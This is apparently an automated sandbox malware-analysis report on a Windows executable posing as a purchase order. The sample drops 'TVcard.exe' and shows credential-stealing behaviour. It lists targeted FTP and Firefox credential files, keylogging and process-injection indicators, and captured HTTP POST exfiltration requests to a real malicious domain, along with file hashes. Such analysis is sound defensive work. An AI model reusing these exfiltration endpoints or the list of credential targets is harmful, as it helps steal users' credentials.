OUR ORDER NO HSCLGD-140526.exe
This report is generated from a file or URL submitted to this webservice on May 14th 2019 06:29:56 (UTC)
Guest System: Windows 7 32 bit, Professional, 6.1 (build 7601), Service Pack 1
Report generated by Falcon Sandbox v8.30 © Hybrid Analysis
Incident Response

Risk Assessment
- Remote Access
  - Contains a remote desktop related string
  - Reads terminal service related keys (often RDP related)
- Spyware
  - Contains ability to open the clipboard
  - Contains ability to retrieve keyboard strokes
  - POSTs files to a webserver
- Stealer/Phishing
  - Scans for artifacts that may help identify the target
  - Tries to steal FTP credentials
- Persistence
  - Writes data to a remote process
- Fingerprint
  - Contains ability to query information about shared network resources
  - Queries kernel debugger information
  - Queries sensitive IE security settings
  - Reads the active computer name
  - Reads the cryptographic machine GUID
  - Scans for artifacts that may help identify the target
- Evasive
  - Marks file for deletion
  - Reads Antivirus engine related registry keys
- Spreading
  - Opens the MountPointManager (often used to detect additional infection locations)
- Network Behavior
  - Contacts 1 domain.
MITRE ATT&CK™ Techniques Detection
Indicators
Not all malicious and suspicious indicators are displayed.

Malicious Indicators 15

Anti-Detection/Stealthiness

- Reads Antivirus engine related registry keys
  - details: "TVcard.exe" (Path: "HKLM\SOFTWARE\COMODOGROUP\ICEDRAGON\SETUP")
  - source: Registry Access
  - relevance: 8/10
  - ATT&CK ID: T1063

External Systems

- Found an IP/URL artifact that was identified as malicious by a significant amount of reputation engines
  - details:
    - 7/70 reputation engines marked "http://blacklifestyle.net" as malicious (10% detection rate)
    - 6/67 reputation engines marked "http://fuckav.ru" as malicious (8% detection rate)
    - 12/70 reputation engines marked "http://blacklifestyle.net/sliver/power/energy/fre.php" as malicious (17% detection rate)
  - source: External System
  - relevance: 10/10
  - ATT&CK ID: T1120
- Sample was identified as malicious by a large number of Antivirus engines
  - details: 45/73 Antivirus vendors marked sample as malicious (61% detection rate)
  - source: External System
  - relevance: 10/10
- Sample was identified as malicious by at least one Antivirus engine
  - details: 45/73 Antivirus vendors marked sample as malicious (61% detection rate)
  - source: External System
  - relevance: 8/10

General

- The analysis extracted a file that was identified as malicious
  - details: 29/73 Antivirus vendors marked dropped file "TVcard.exe" as malicious (classified as "Trojan.Generic" with 39% detection rate)
  - source: Binary File
  - relevance: 10/10
- The analysis spawned a process that was identified as malicious
  - details:
    - 29/73 Antivirus vendors marked spawned process "TVcard.exe" (PID: 4500) as malicious (classified as "Trojan.Generic" with 39% detection rate)
    - 29/73 Antivirus vendors marked spawned process "TVcard.exe" (PID: 4484) as malicious (classified as "Trojan.Generic" with 39% detection rate)
  - source: Monitored Target
  - relevance: 10/10

Installation/Persistence

- Allocates virtual memory in a remote process
  - details: "OURORDERNOHSCLGD-140526.exe" allocated memory in "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume\{dcbfaac4-d863-11e7-b9ff-806e6f6e6963}"
  - source: API Call
  - relevance: 7/10
  - ATT&CK ID: T1055
- Writes data to a remote process
  - details:
    - "OURORDERNOHSCLGD-140526.exe" wrote 32 bytes to a remote process "%LOCALAPPDATA%\TVcard.exe" (Handle: 580)
    - "OURORDERNOHSCLGD-140526.exe" wrote 52 bytes to a remote process "%LOCALAPPDATA%\TVcard.exe" (Handle: 580)
    - "OURORDERNOHSCLGD-140526.exe" wrote 4 bytes to a remote process "%LOCALAPPDATA%\TVcard.exe" (Handle: 580)
    - "TVcard.exe" wrote 32 bytes to a remote process "%LOCALAPPDATA%\TVcard.exe" (Handle: 160)
    - "TVcard.exe" wrote 52 bytes to a remote process "%LOCALAPPDATA%\TVcard.exe" (Handle: 160)
    - "TVcard.exe" wrote 4 bytes to a remote process "%LOCALAPPDATA%\TVcard.exe" (Handle: 160)
    - "TVcard.exe" wrote 663552 bytes to a remote process "%LOCALAPPDATA%\TVcard.exe" (Handle: 160)
  - source: API Call
  - relevance: 6/10
  - ATT&CK ID: T1055

Spyware/Information Retrieval

- Scans for artifacts that may help identify the target
  - details:
    - "TVcard.exe" (Path: "HKCU\SOFTWARE\INCREDIMAIL\IDENTITIES")
    - "TVcard.exe" (Path: "HKLM\SOFTWARE\INCREDIMAIL\IDENTITIES")
    - "TVcard.exe" (Path: "HKCU\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\WINDOWS MESSAGING SUBSYSTEM\PROFILES\OUTLOOK\9375CFF0413111D3B88A00104B2A6676")
    - "TVcard.exe" (Path: "HKCU\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\WINDOWS MESSAGING SUBSYSTEM\PROFILES\OUTLOOK\9375CFF0413111D3B88A00104B2A6676\00000001")
    - "TVcard.exe" (Path: "HKCU\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\WINDOWS MESSAGING SUBSYSTEM\PROFILES\OUTLOOK\9375CFF0413111D3B88A00104B2A6676\00000002")
    - "TVcard.exe" (Path: "HKCU\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\WINDOWS MESSAGING SUBSYSTEM\PROFILES\OUTLOOK\9375CFF0413111D3B88A00104B2A6676\00000003")
    - "TVcard.exe" (Path: "HKCU\SOFTWARE\MICROSOFT\OFFICE\15.0\OUTLOOK\PROFILES\OUTLOOK")
    - "TVcard.exe" (Path: "HKCU\SOFTWARE\MICROSOFT\OFFICE\16.0\OUTLOOK\PROFILES\OUTLOOK")
  - source: Registry Access
  - relevance: 3/10
  - ATT&CK ID: T1012
- Tries to steal FTP credentials
  - details:
    - "%s\BlazeFtp\site.dat" (Indicator: "\blazeftp\")
    - "Software\FlashPeak\BlazeFtp\Settings" (Indicator: "\blazeftp\")
    - "%s\Estsoft\ALFTP\ESTdb2.dat" (Indicator: "\alftp\")
    - "%s\FTPGetter\Profile\servers.xml" (Indicator: "\ftpgetter\")
    - "%s\FTPGetter\servers.xml" (Indicator: "\ftpgetter\")
    - "ftware\FlashPeak\BlazeFtp\Settings" (Indicator: "\blazeftp\")
  - source: File/Memory
  - relevance: 6/10
  - ATT&CK ID: T1081

Unusual Characteristics

- Checks for a resource fork (ADS) file
  - details: "OURORDERNOHSCLGD-140526.exe" checked file "C:"
  - source: API Call
  - relevance: 5/10
- References suspicious system modules
  - details: "lsass.exe"
  - source: File/Memory
  - relevance: 5/10
  - ATT&CK ID: T1215

Hiding 3 Malicious Indicators
- All indicators are available only in the private webservice or standalone version

Suspicious Indicators 33

Anti-Detection/Stealthiness

- Queries kernel debugger information
  - details: "TVcard.exe" at 00017421-00004484-00000105-6023503204
  - source: API Call
  - relevance: 6/10

Anti-Reverse Engineering

- Looks up many procedures within the same disassembly stream (often used to hide usage)
  - details:
    - Found 47 calls to GetProcAddress@KERNEL32.DLL from OURORDERNOHSCLGD-140526.exe (PID: 3896)
    - Found 11 calls to GetProcAddress@KERNEL32.DLL from OURORDERNOHSCLGD-140526.exe (PID: 3896)
    - Found 10 calls to GetProcAddress@KERNEL32.DLL from OURORDERNOHSCLGD-140526.exe (PID: 3896)
  - source: Hybrid Analysis Technology
  - relevance: 10/10
- PE file has unusual entropy sections
  - details: .rsrc with unusual entropy 7.51579763048
  - source: Static Parser
  - relevance: 10/10

Environment Awareness

- Contains ability to measure performance
  - details:
    - rdtsc from TVcard.exe (PID: 4500)
    - rdtsc
  - source: Hybrid Analysis Technology
  - relevance: 10/10
- Contains ability to query information about shared network resources
  - details:
    - EnumPrintersA@WINSPOOL.DRV from OURORDERNOHSCLGD-140526.exe (PID: 3896)
    - EnumPrintersA@WINSPOOL.DRV from OURORDERNOHSCLGD-140526.exe (PID: 3896)
  - source: Hybrid Analysis Technology
  - relevance: 10/10
  - ATT&CK ID: T1012
- Contains ability to read monitor info
  - details:
    - GetMonitorInfoA@USER32.DLL from OURORDERNOHSCLGD-140526.exe (PID: 3896)
    - GetMonitorInfoA@USER32.DLL from OURORDERNOHSCLGD-140526.exe (PID: 3896)
    - GetMonitorInfoA@USER32.DLL from OURORDERNOHSCLGD-140526.exe (PID: 3896)
  - source: Hybrid Analysis Technology
  - relevance: 5/10
  - ATT&CK ID: T1082
- Reads the active computer name
  - details:
    - "OURORDERNOHSCLGD-140526.exe" (Path: "HKLM\SYSTEM\CONTROLSET001\CONTROL\COMPUTERNAME\ACTIVECOMPUTERNAME"; Key: "COMPUTERNAME")
    - "TVcard.exe" (Path: "HKLM\SYSTEM\CONTROLSET001\CONTROL\COMPUTERNAME\ACTIVECOMPUTERNAME"; Key: "COMPUTERNAME")
  - source: Registry Access
  - relevance: 5/10
  - ATT&CK ID: T1012
- Reads the cryptographic machine GUID
  - details: "TVcard.exe" (Path: "HKLM\SOFTWARE\MICROSOFT\CRYPTOGRAPHY"; Key: "MACHINEGUID")
  - source: Registry Access
  - relevance: 10/10
  - ATT&CK ID: T1012

External Systems

- Found an IP/URL artifact that was identified as malicious by at least one reputation engine
  - details:
    - 1/69 reputation engines marked "http://ckav.ru" as malicious (1% detection rate)
    - 7/70 reputation engines marked "http://blacklifestyle.net" as malicious (10% detection rate)
    - 6/67 reputation engines marked "http://fuckav.ru" as malicious (8% detection rate)
    - 12/70 reputation engines marked "http://blacklifestyle.net/sliver/power/energy/fre.php" as malicious (17% detection rate)
  - source: External System
  - relevance: 10/10

General

- Contains ability to find and load resources of a specific module
  - details:
    - FreeResource@KERNEL32.DLL from OURORDERNOHSCLGD-140526.exe (PID: 3896)
    - LoadResource@KERNEL32.DLL from OURORDERNOHSCLGD-140526.exe (PID: 3896)
    - LoadResource@KERNEL32.DLL from OURORDERNOHSCLGD-140526.exe (PID: 3896)
    - FindResourceA@KERNEL32.DLL from OURORDERNOHSCLGD-140526.exe (PID: 3896)
    - LoadResource@KERNEL32.DLL from OURORDERNOHSCLGD-140526.exe (PID: 3896)
    - FreeResource@KERNEL32.DLL from OURORDERNOHSCLGD-140526.exe (PID: 3896)
  - source: Hybrid Analysis Technology
  - relevance: 1/10
- POSTs files to a webserver
  - details:
    - Request with no payload:

          POST /sliver/power/energy/fre.php HTTP/1.0
          User-Agent: Mozilla/4.08 (Charon; Inferno)
          Host: blacklifestyle.net
          Accept: */*
          Content-Type: application/octet-stream
          Content-Encoding: binary
          Content-Key: A94C4A2C
          Content-Length: 192
          Connection: close

    - Request with no payload:

          POST /sliver/power/energy/fre.php HTTP/1.0
          User-Agent: Mozilla/4.08 (Charon; Inferno)
          Host: blacklifestyle.net
          Accept: */*
          Content-Type: application/octet-stream
          Content-Encoding: binary
          Content-Key: A94C4A2C
          Content-Length: 165
          Connection: close

  - source: Network Traffic
  - relevance: 5/10
- Reads configuration files
  - details: "OURORDERNOHSCLGD-140526.exe" read file "%APPDATA%\Mozilla\Firefox\profiles.ini"
  - source: API Call
  - relevance: 4/10

Installation/Persistence

- Drops executable files
  - details: "TVcard.exe" has type "PE32 executable (GUI) Intel 80386 for MS Windows"
  - source: Binary File
  - relevance: 10/10

Network Related

- Uses a User Agent typical for browsers, although no browser was ever launched
  - details: Found user agent(s): Mozilla/4.08 (Charon; Inferno)
  - source: Network Traffic
  - relevance: 10/10

Pattern Matching

- Contains ability to download files from the internet
  - details: recv@WS2_32.DLL from TVcard.exe (PID: 4484)
  - source: Hybrid Analysis Technology
  - relevance: 10/10

Remote Access Related

- Contains a remote desktop related string
  - details: "<.vnc" (Indicator for product: Generic VNC)
  - source: File/Memory
  - relevance: 10/10
- Reads terminal service related keys (often RDP related)
  - details:
    - "OURORDERNOHSCLGD-140526.exe" (Path: "HKLM\SYSTEM\CONTROLSET001\CONTROL\TERMINAL SERVER"; Key: "TSUSERENABLED")
    - "TVcard.exe" (Path: "HKLM\SYSTEM\CONTROLSET001\CONTROL\TERMINAL SERVER"; Key: "TSUSERENABLED")
  - source: Registry Access
  - relevance: 10/10
  - ATT&CK ID: T1076

Spyware/Information Retrieval

- Contains ability to open the clipboard
  - details:
    - OpenClipboard@USER32.DLL from OURORDERNOHSCLGD-140526.exe (PID: 3896)
    - OpenClipboard@USER32.DLL from OURORDERNOHSCLGD-140526.exe (PID: 3896)
  - source: Hybrid Analysis Technology
  - relevance: 10/10
  - ATT&CK ID: T1115
- Contains ability to retrieve keyboard strokes
  - details:
    - GetKeyboardState@USER32.DLL from OURORDERNOHSCLGD-140526.exe (PID: 3896)
    - GetKeyboardState@USER32.DLL from OURORDERNOHSCLGD-140526.exe (PID: 3896)
    - GetKeyboardState@USER32.DLL from OURORDERNOHSCLGD-140526.exe (PID: 3896)
  - source: Hybrid Analysis Technology
  - relevance: 8/10
  - ATT&CK ID: T1056

System Destruction

- Marks file for deletion
  - details:
    - "%LOCALAPPDATA%\TVcard.exe" marked "%APPDATA%\B52C16\66E7F2.lck" for deletion
    - "%LOCALAPPDATA%\TVcard.exe" marked "%APPDATA%\Microsoft\Crypto\RSA\S-1-5-21-2092356043-4041700817-663127204-1001\c6e53759ff54727c35ea84c1a56f8b1f_733c94c5-cebb-4f98-a75f-22a797d1d50b" for deletion
  - source: API Call
  - relevance: 10/10
  - ATT&CK ID: T1107
- Opens file with deletion access rights
  - details:
    - "OURORDERNOHSCLGD-140526.exe" opened "%APPDATA%\B52C16\66E7F2.lck" with delete access
    - "TVcard.exe" opened "%APPDATA%\Microsoft\Crypto\RSA\S-1-5-21-2092356043-4041700817-663127204-1001\c6e53759ff54727c35ea84c1a56f8b1f_733c94c5-cebb-4f98-a75f-22a797d1d50b" with delete access
  - source: API Call
  - relevance: 7/10

System Security

- Modifies proxy settings
  - details:
    - "OURORDERNOHSCLGD-140526.exe" (Access type: "DELETEVAL"; Path: "HKCU\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\ZONEMAP"; Key: "PROXYBYPASS")
    - "OURORDERNOHSCLGD-140526.exe" (Access type: "DELETEVAL"; Path: "HKLM\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\ZONEMAP"; Key: "PROXYBYPASS")
  - source: Registry Access
  - relevance: 10/10
  - ATT&CK ID: T1112
- Queries sensitive IE security settings
  - details: "OURORDERNOHSCLGD-140526.exe" (Path: "HKCU\SOFTWARE\MICROSOFT\INTERNET EXPLORER\SECURITY"; Key: "DISABLESECURITYSETTINGSCHECK")
  - source: Registry Access
  - relevance: 8/10
  - ATT&CK ID: T1012

Unusual Characteristics

- Imports suspicious APIs
  - details: RegOpenKeyExA, RegCloseKey, OpenFileMappingA, WriteFile, GetModuleFileNameA, LoadLibraryExA, UnhandledExceptionFilter, GetModuleHandleA, CreateThread, GetTickCount, GetVersionExA, LoadLibraryA, GetStartupInfoA, GetFileSize, DeleteFileA, GetProcAddress, FindFirstFileA, GetComputerNameA, CreateFileA, LockResource, GetCommandLineA, Sleep, FindResourceA, VirtualAlloc, ShellExecuteA, GetCursorPos, GetUpdateRect, GetLastActivePopup, SetWindowsHookExA, FindWindowA, GetWindowThreadProcessId, EnumPrintersA, VirtualProtect
  - source: Static Parser
  - relevance: 1/10
- Installs hooks/patches the running process
  - details:
    - "OURORDERNOHSCLGD-140526.exe" wrote bytes "d0553776647340760000000051c1227694982276ee9c227675dc2476273e24760fb3287600000000acdc06761bf70676c1080876c0d90676152e067636da0676d5d9067630c60676e0c2067642c606761bc6067686c4067672c6067600000000" to virtual address "0x6EDE1000" (part of module "SHFOLDER.DLL")
    - "TVcard.exe" wrote bytes "d0553776647340760000000051c1227694982276ee9c227675dc2476273e24760fb3287600000000acdc06761bf70676c1080876c0d90676152e067636da0676d5d9067630c60676a0c4067642c606761bc6067686c4067672c6067600000000" to virtual address "0x6EDE1000" (part of module "SHFOLDER.DLL")
    - "TVcard.exe" wrote bytes "fdfe0676e0c50676ee29847710c6067600d0067600000000473f0c778a3f0c7728470c770000000096421e761b4b1e7618391e76b23a1e76b83e1e76196c1e7626681e76f5681e76000000009027d96e76b546772386497700000000" to virtual address "0x00415000" (part of module "TVCARD.EXE")
    - "TVcard.exe" wrote bytes "c04e827720548377e0658377b53884770000000000d0067600000000c5ea06760000000088ea067600000000e968937582288477ee29847700000000d2699375000000007dbb06760000000009be937500000000ba18067600000000" to virtual address "0x77A31000" (part of module "NSI.DLL")
    - "TVcard.exe" wrote bytes "fae67f77e1a684772e718477ee29847785e27f776da0847726e47f77d16d8477003d8277804b827700000000ad371e768b2d1e76b6411e7600000000" to virtual address "0x74B81000" (part of module "WSHTCPIP.DLL")
    - "TVcard.exe" wrote bytes "e7398077e1a684772e718477ee29847785e27f776da08477906483773ad58a7726e47f77d16d8477003d8277804b827700000000ad371e768b2d1e76b6411e7600000000" to virtual address "0x750E1000" (part of module "WSHIP6.DLL")
  - source: Hook Detection
  - relevance: 10/10
  - ATT&CK ID: T1179
- Reads information about supported languages
  - details: "OURORDERNOHSCLGD-140526.exe" (Path: "HKLM\SYSTEM\CONTROLSET001\CONTROL\NLS\LOCALE"; Key: "00000409")
  - source: Registry Access
  - relevance: 3/10
  - ATT&CK ID: T1012

Hiding 7 Suspicious Indicators
- All indicators are available only in the private webservice or standalone version

Informative 24

Anti-Reverse Engineering

- Found strings in conjunction with a procedure lookup that resolve to a known API export symbol
  - details:
    - Found reference to API InitCommonControlsEx@COMCTL32.DLL from OURORDERNOHSCLGD-140526.exe (PID: 3896)
    - Found reference to API ImageList_WriteEx@COMCTL32.DLL from OURORDERNOHSCLGD-140526.exe (PID: 3896)
    - Found reference to API FlatSB_SetScrollRange@COMCTL32.DLL from OURORDERNOHSCLGD-140526.exe (PID: 3896)
    - Found reference to API FlatSB_GetScrollInfo@COMCTL32.DLL from OURORDERNOHSCLGD-140526.exe (PID: 3896)
  - source: Hybrid Analysis Technology
  - relevance: 10/10
- PE file contains zero-size sections
  - details:
    - Raw size of "BSS" is zero
    - Raw size of ".tls" is zero
  - source: Static Parser
  - relevance: 10/10

Environment Awareness

- Contains ability to query machine time
  - details:
    - GetLocalTime@KERNEL32.DLL from OURORDERNOHSCLGD-140526.exe (PID: 3896)
    - GetLocalTime@KERNEL32.DLL from OURORDERNOHSCLGD-140526.exe (PID: 3896)
    - GetLocalTime@KERNEL32.DLL from OURORDERNOHSCLGD-140526.exe (PID: 3896)
    - GetLocalTime@KERNEL32.DLL from TVcard.exe (PID: 4500)
  - source: Hybrid Analysis Technology
  - relevance: 1/10
  - ATT&CK ID: T1124
- Contains ability to query the machine version
  - details:
    - GetVersion@KERNEL32.DLL from OURORDERNOHSCLGD-140526.exe (PID: 3896)
    - GetVersionExA@KERNEL32.DLL from OURORDERNOHSCLGD-140526.exe (PID: 3896)
    - GetVersion@KERNEL32.DLL from OURORDERNOHSCLGD-140526.exe (PID: 3896)
    - GetVersion@KERNEL32.DLL from OURORDERNOHSCLGD-140526.exe (PID: 3896)
    - GetVersion@KERNEL32.DLL from OURORDERNOHSCLGD-140526.exe (PID: 3896)
    - GetVersion@KERNEL32.DLL from OURORDERNOHSCLGD-140526.exe (PID: 3896)
    - GetVersionExA@KERNEL32.DLL from TVcard.exe (PID: 4500)
  - source: Hybrid Analysis Technology
  - relevance: 1/10
- Contains ability to query volume size
  - details:
    - GetDiskFreeSpaceA@KERNEL32.DLL from OURORDERNOHSCLGD-140526.exe (PID: 3896)
    - GetDiskFreeSpaceA@KERNEL32.DLL from TVcard.exe (PID: 4500)
  - source: Hybrid Analysis Technology
  - relevance: 3/10
  - ATT&CK ID: T1083
- Makes a code branch decision directly after an API that is environment aware
  - details:
    - Found API call GetVersion@KERNEL32.DLL directly followed by "cmp ax, 0004h" and "setnb byte ptr [004C6AE0h]" from OURORDERNOHSCLGD-140526.exe (PID: 3896)
    - Found API call GetVersion@KERNEL32.DLL directly followed by "cmp ax, 0004h" and "jc 0045B016h" from OURORDERNOHSCLGD-140526.exe (PID: 3896)
    - Found API call GetVersion@KERNEL32.DLL directly followed by "cmp eax, 80000000h" and "je 00406E7Dh" from OURORDERNOHSCLGD-140526.exe (PID: 3896)
  - source: Hybrid Analysis Technology
  - relevance: 10/10
- Possibly tries to detect the presence of a debugger
  - details:
    - GetProcessHeap@KERNEL32.DLL from TVcard.exe (PID: 4484)
    - GetProcessHeap@KERNEL32.DLL from TVcard.exe (PID: 4484)
  - source: Hybrid Analysis Technology
  - relevance: 1/10
- Queries volume information
  - details:
    - "TVcard.exe" queries volume information of "%APPDATA%\Mozilla\Firefox\Profiles\g4h7miqt.default\key3.db" at 00017421-00004484-0000010C-9786479558
    - "TVcard.exe" queries volume information of "%APPDATA%\Mozilla\Firefox\Profiles\g4h7miqt.default\secmod.db" at 00017421-00004484-0000010C-18790686681
    - "TVcard.exe" queries volume information of "C:\" at 00017421-00004484-0000010C-18827441709
    - "TVcard.exe" queries volume information of "%APPDATA%\Mozilla\Firefox\Profiles\g4h7miqt.default\cert8.db" at 00017421-00004484-0000010C-18830390262
  - source: API Call
  - relevance: 2/10
  - ATT&CK ID: T1120
- Queries volume information of an entire harddrive
  - details: "TVcard.exe" queries volume information of "C:\" at 00017421-00004484-0000010C-18827441709
  - source: API Call
  - relevance: 8/10
  - ATT&CK ID: T1120
- Reads the registry for installed applications
  - details:
    - "OURORDERNOHSCLGD-140526.exe" (Path: "HKCU\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\APP PATHS\TVCARD.EXE")
    - "OURORDERNOHSCLGD-140526.exe" (Path: "HKLM\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\APP PATHS\TVCARD.EXE")
  - source: Registry Access
  - relevance: 10/10
  - ATT&CK ID: T1012

General

- Contacts domains
  - details: "blacklifestyle.net"
  - source: Network Traffic
  - relevance: 1/10
- Creates mutants
  - details:
    - "\Sessions\1\BaseNamedObjects\Local\ZonesCacheCounterMutex"
    - "Local\ZonesCacheCounterMutex"
    - "Local\ZonesLockedCacheCounterMutex"
    - "\Sessions\1\BaseNamedObjects\6897110B52C166E7F20FBF0B"
    - "6897110B52C166E7F20FBF0B"
  - source: Created Mutant
  - relevance: 3/10
- Overview of unique CLSIDs touched in registry
  - details:
    - "OURORDERNOHSCLGD-140526.exe" touched "Computer" (Path: "HKCU\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\SHELLFOLDER")
    - "OURORDERNOHSCLGD-140526.exe" touched "Memory Mapped Cache Mgr" (Path: "HKCU\CLSID\{1F486A52-3CB1-48FD-8F50-B8DC300D9F9D}")
    - "OURORDERNOHSCLGD-140526.exe" touched "Security Manager" (Path: "HKCU\CLSID\{7B8A2D94-0AC9-11D1-896C-00C04FB6BFC4}")
  - source: Registry Access
  - relevance: 3/10
- Spawns new processes
  - details:
    - Spawned process "TVcard.exe"
    - Spawned process "TVcard.exe"
  - source: Monitored Target
  - relevance: 3/10
- Spawns new processes that are not known child processes
  - details:
    - Spawned process "TVcard.exe"
    - Spawned process "TVcard.exe"
  - source: Monitored Target
  - relevance: 3/10

Installation/Persistence

- Connects to LPC ports
  - details: "OURORDERNOHSCLGD-140526.exe" connecting to "\ThemeApiPort"
  - source: API Call
  - relevance: 1/10
- Contains ability to look up the Windows account name
  - details: GetUserNameExW@SSPICLI.DLL from TVcard.exe (PID: 4484)
  - source: Hybrid Analysis Technology
  - relevance: 5/10
- Dropped files
  - details:
    - "TVcard.exe" has type "PE32 executable (GUI) Intel 80386 for MS Windows"
    - "c6e53759ff54727c35ea84c1a56f8b1f_733c94c5-cebb-4f98-a75f-22a797d1d50b" has type "data"
    - "F.bmp" has type "PC bitmap Windows 3.x format 178 x 261 x 24"
  - source: Binary File
  - relevance: 3/10
- Touches files in the Windows directory
  - details:
    - "OURORDERNOHSCLGD-140526.exe" touched file "C:\Windows\Fonts\StaticCache.dat"
    - "OURORDERNOHSCLGD-140526.exe" touched file "C:\Windows\System32\en-US\user32.dll.mui"
    - "OURORDERNOHSCLGD-140526.exe" touched file "C:\Windows\Globalization\Sorting\SortDefault.nls"
    - "OURORDERNOHSCLGD-140526.exe" touched file "C:\Windows\winsxs\x86_microsoft.windows.c..-controls.resources_6595b64144ccf1df_5.82.7600.16385_en-us_020378a8991bbcc2\comctl32.dll.mui"
    - "OURORDERNOHSCLGD-140526.exe" touched file "%LOCALAPPDATA%\Microsoft\Windows\Caches"
    - "OURORDERNOHSCLGD-140526.exe" touched file "C:\Users\%USERNAME%\AppData\Local\Microsoft\Windows\Caches\cversions.1.db"
    - "OURORDERNOHSCLGD-140526.exe" touched file "C:\Users\%USERNAME%\AppData\Local\Microsoft\Windows\Caches\{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.ver0x000000000000001b.db"
    - "OURORDERNOHSCLGD-140526.exe" touched file "C:\Windows\AppPatch\sysmain.sdb"
    - "OURORDERNOHSCLGD-140526.exe" touched file "%LOCALAPPDATA%\Microsoft\Windows\Caches"
    - "OURORDERNOHSCLGD-140526.exe" touched file "%LOCALAPPDATA%\Microsoft\Windows\Caches\cversions.1.db"
    - "OURORDERNOHSCLGD-140526.exe" touched file "%LOCALAPPDATA%\Microsoft\Windows\Caches\{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.ver0x000000000000001b.db"
    - "TVcard.exe" touched file "C:\Windows\AppPatch\sysmain.sdb"
    - "TVcard.exe" touched file "C:\Windows\Globalization\Sorting\SortDefault.nls"
    - "TVcard.exe" touched file "C:\Windows\System32\rsaenh.dll"
    - "TVcard.exe" touched file "C:\Windows\System32\tzres.dll"
  - source: API Call
  - relevance: 7/10

Network Related

- Found potential URL in binary/memory
  - details:
    - Heuristic match: "Font.Name"
    - Heuristic match: "blacklifestyle.net"
    - Heuristic match: "ckav.ru"
    - Pattern match: "http://blacklifestyle.net/sliver/power/energy/fre.php"
    - Heuristic match: "Fuckav.ru"
    - Pattern match: "http://www.ibsensoftware.com/"
  - source: File/Memory
  - relevance: 10/10

System Security

- Creates or modifies Windows services
  - details: "TVcard.exe" (Access type: "CREATE"; Path: "HKLM\SYSTEM\CURRENTCONTROLSET\SERVICES\TCPIP\PARAMETERS")
  - source: Registry Access
  - relevance: 10/10
  - ATT&CK ID: T1112
- Opens the Kernel Security Device Driver (KsecDD) of Windows
  - details:
    - "OURORDERNOHSCLGD-140526.exe" opened "\Device\KsecDD"
    - "TVcard.exe" opened "\Device\KsecDD"
  - source: API Call
  - relevance: 10/10
  - ATT&CK ID: T1215

Unusual Characteristics

- Found Delphi 4 - Delphi 2006 artifact
  - details:
    - "17568511126f680d54035ef6bab48da803ca272f9f2817bc72a6bdaca67e87d2.bin" has a PE timestamp using the buggy magic timestamp 0x2A425E19.
    - "TVcard.exe" has a PE timestamp using the buggy magic timestamp 0x2A425E19. The real compilation date is probably Thu Jan 1 00:00:00 1970
  - source: Static Parser
  - relevance: 10/10
- Matched Compiler/Packer signature
  - details: "17568511126f680d54035ef6bab48da803ca272f9f2817bc72a6bdaca67e87d2.bin" was detected as "Borland Delphi 4.0"
  - source: Static Parser
  - relevance: 10/10
  - ATT&CK ID: T1002

File Details

OUR ORDER NO HSCLGD-140526.exe
- Filename: OUR ORDER NO HSCLGD-140526.exe
- Size: 1.5MiB (1620480 bytes)
- Type: peexe executable
- Description: PE32 executable (GUI) Intel 80386, for MS Windows
- Architecture: WINDOWS
- SHA256: 17568511126f680d54035ef6bab48da803ca272f9f2817bc72a6bdaca67e87d2
- MD5: 8e3fe573d618d8aa5cc78a0c9ab7cfd7
- SHA1: b8fb9fc12562e84649f7a15fb3c308ddf0252444
- ssdeep: 24576:Fdcm7EwVeP6YCXPtOHwZtt9oSO9y4INOOSl+Ztt9oSO9yrSR2:FdcmN/FHtO9y2+HtO9yD
- imphash: e4d769b6bf60944eec2e858a8542b519
- authentihash: dec6270739ef0ed207b7c981d3f4b0f401150b72d44e83d7c5606fc094f8c70b
- Compiler/Packer: Borland Delphi 4.0

Classification (TrID)
- 35.5% (.EXE) Win32 Executable Delphi generic
- 32.8% (.SCR) Windows screen saver
- 11.2% (.EXE) Win32 Executable (generic)
- 5.1% (.EXE) Win16/32 Executable Delphi generic
- 5.0% (.EXE) OS/2 Executable (generic)

Hybrid Analysis

Analysed 3 processes in total.
- OURORDERNOHSCLGD-140526.exe (PID: 3896): 45/73
- TVcard.exe (PID: 4500): 29/73
- TVcard.exe (PID: 4484): 29/73

Network Analysis

DNS Requests

| Domain | Address | Registrar | Country |
|---|---|---|---|
| blacklifestyle.net | 47.254.173.224 (TTL: 599) | Hostinger, UAB (Organization: King Kendrick Kendrick; Name Server: A.DNSPOD.COM; Creation Date: Thu, 21 Mar 2019 23:39:25 GMT) | United States |
Contacted Hosts
No relevant hosts were contacted.

HTTP Traffic

| Endpoint | Request | URL | Content-Length |
|---|---|---|---|
| 47.254.173.224:80 (blacklifestyle.net) | POST | blacklifestyle.net/sliver/power/energy/fre.php | 192 |
| 47.254.173.224:80 (blacklifestyle.net) | POST | blacklifestyle.net/sliver/power/energy/fre.php | 192 |
| 47.254.173.224:80 (blacklifestyle.net) | POST | blacklifestyle.net/sliver/power/energy/fre.php | 192 |
| 47.254.173.224:80 (blacklifestyle.net) | POST | blacklifestyle.net/sliver/power/energy/fre.php | 165 |
| 47.254.173.224:80 (blacklifestyle.net) | POST | blacklifestyle.net/sliver/power/energy/fre.php | 165 |

Request headers as captured for the first request; the other four differ only in Content-Length (192 for requests 1 to 3, 165 for requests 4 and 5):

    POST /sliver/power/energy/fre.php HTTP/1.0
    User-Agent: Mozilla/4.08 (Charon; Inferno)
    Host: blacklifestyle.net
    Accept: */*
    Content-Type: application/octet-stream
    Content-Encoding: binary
    Content-Key: A94C4A2C
    Content-Length: 192
    Connection: close

Memory Forensics

| String | Context | Stream UID |
|---|---|---|
| ckav.ru | Domain/IP reference | 00017421-00004484-17710-112-00414325 |
| http://blacklifestyle.net/sliver/power/energy/fre.php | Domain/IP reference | 00017421-00004484-17710-56-004036F2 |
| 9bis.com | Domain/IP reference | 00017421-00004484-17710-422-0040F775 |
